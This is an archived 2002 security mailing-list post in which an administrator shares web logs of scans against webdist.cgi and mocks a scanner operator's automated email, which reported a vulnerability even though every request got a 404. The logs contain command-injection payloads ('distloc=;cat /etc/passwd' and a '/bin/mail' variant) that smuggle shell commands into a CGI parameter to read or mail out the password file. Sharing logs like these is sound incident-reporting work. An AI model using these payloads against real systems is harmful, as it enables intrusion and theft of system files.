I got the following scans in my logs yesterday. 68.46.64.23 - - [05/Sep/2002:17:37:37 -0400] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 404 2656 "-" "-" 68.46.64.23 - - [05/Sep/2002:17:44:13 -0400] "GET /cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[vulnat_private] HTTP/1.0" 404 2656 "-" "-" 68.46.64.23 - - [05/Sep/2002:17:49:22 -0400] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 404 2656 "-" "-" Now I got the following email today. > This is an automated message: > > This system was scanned by GoogleMaker 1.0, and is found to have a > vulnurability. Please contact a system administrator. > > Vulnurability: Vulnerability in webdist.cgi > Information: http://www.cert.org/advisories/CA-1997-12.html > > > URGENT - URGENT - URGENT > > Thank you, > TZSecurity. > > What is funny about this is that I do not run this software and they are reporting I do. Seems this persons scanner can't figure out what 404 codes mean. I am reporting this mostly for the fact that if they are reporting false information to me they are probably doing so to others and people should be aware. Visiting the site I see that it is webattack.com editor's pick. Tip for webattack not to pick sites who can't tell the difference between 404 and 200. Regards, - zenoat_private ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Fri Sep 06 2002 - 15:11:57 PDT